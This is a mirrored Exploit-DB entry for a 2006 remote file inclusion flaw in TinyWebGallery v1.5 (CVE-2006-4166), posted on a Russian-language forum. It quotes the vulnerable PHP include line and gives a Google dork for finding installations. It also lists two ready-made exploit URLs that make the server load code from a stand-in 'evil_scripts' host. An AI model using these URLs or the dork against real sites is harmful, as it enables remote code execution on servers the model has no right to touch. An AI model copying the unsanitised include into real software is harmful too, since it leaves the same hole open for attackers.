- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2158
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4166
- Дата публикации
- 2006-08-09
Код:
####################################################
# #
# #
# C Y B E R - W A R R i O R T I M #
# #
# #
####################################################
TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:
<?php
include ($image . ".txt");
?>
------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------
Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts
http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?
###########################################################################
# #
#Greetz: str0ke, Preddy, Iron, x-master, DJR, R3D4C!D and all my friends #
# #
###########################################################################
# milw0rm.com [2006-08-09]- Источник
- www.exploit-db.com
